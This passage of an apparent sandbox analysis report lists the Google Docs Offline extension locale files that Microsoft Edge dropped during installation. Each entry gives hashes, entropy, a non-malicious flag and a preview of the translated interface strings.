                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):934
                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):963
                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):884
                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):980
                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):879
                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                Malicious:false
